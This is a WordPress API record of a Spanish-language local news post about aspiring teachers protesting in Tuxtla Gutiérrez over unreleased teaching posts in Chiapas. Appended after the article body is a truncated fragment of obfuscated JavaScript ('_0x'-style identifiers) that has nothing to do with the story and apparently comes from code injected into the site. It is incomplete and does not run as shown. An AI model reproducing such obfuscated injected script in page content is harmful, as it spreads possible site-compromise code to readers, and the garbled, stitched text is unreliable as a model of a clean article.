{"id":24305,"date":"2025-10-02T03:45:16","date_gmt":"2025-10-02T03:45:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24305"},"modified":"2025-10-02T03:45:17","modified_gmt":"2025-10-02T03:45:17","slug":"aspirantes-piden-que-se-libere-plazas-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24305","title":{"rendered":"Aspirantes piden que se libere plazas en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"399\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000360860.jpg\" alt=\"\" class=\"wp-image-24306\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000360860.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000360860-300x166.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p><br>Manuel Jim\u00e9nez.<br>1 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Un grupo de aspirantes a plazas docentes se manifestaron este mi\u00e9rcoles en el centro de Tuxtla Guti\u00e9rrez para exigir a las autoridades estatales la inmediata liberaci\u00f3n de convocatorias y plazas docentes que est\u00e1n \u201cocultas&#8221;<br>Montserrat, una de las aspirantes, explic\u00f3 que el movimiento est\u00e1 integrado por egresados de los niveles de primaria biling\u00fce, preescolar biling\u00fce, m\u00fasica, telesecundaria y educaci\u00f3n f\u00edsica.<br>Denunci\u00f3 la falta de respuesta clara por parte de la Secretar\u00eda de Educaci\u00f3n estatal y del gobierno de Chiapas.<br>&#8220;Exigimos la liberaci\u00f3n de plazas. No hemos tenido ninguna respuesta por parte de la secretar\u00eda ni del gobierno&#8221;, afirm\u00f3 Montserrat durante la protesta. &#8220;Ya estamos en el mes de octubre y no nos han clarificado nada&#8221;.<br>Los manifestantes cuestionaron la opacidad en el proceso. Aseguraron que, a excepci\u00f3n de un n\u00famero muy reducido de plazas asignadas para preescolar, el resto de los niveles educativos han sido ignorados.<br>&#8220;\u00bfEn d\u00f3nde est\u00e1n esas plazas que nosotros realmente necesitamos?&#8221;, se pregunt\u00f3 la portavoz, exigiendo transparencia sobre los motivos de la demora.<br>Los aspirantes calculan que son &#8220;miles&#8221; los afectados, incluyendo a egresados de diversas normales, como la Normal Experimental, con casos de personas que llevan esperando desde hace quince, cinco, cuatro o tres a\u00f1os para obtener una plaza base.<br>&#8220;Si no hay una fecha de soluci\u00f3n, nosotros como aspirantes vamos a seguir en marcha porque es lo que realmente estamos necesitando&#8221;, sentenci\u00f3 Montserrat.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.1 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Un grupo de aspirantes a plazas docentes se manifestaron este mi\u00e9rcoles en el centro de Tuxtla Guti\u00e9rrez para exigir a las autoridades estatales la inmediata liberaci\u00f3n de convocatorias y plazas docentes que est\u00e1n \u201cocultas&#8221;Montserrat, una de las aspirantes, explic\u00f3 que el movimiento est\u00e1 integrado por egresados de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24306,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24305","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24305","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24305"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24305\/revisions"}],"predecessor-version":[{"id":24307,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24305\/revisions\/24307"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24306"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24305"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24305"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24305"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}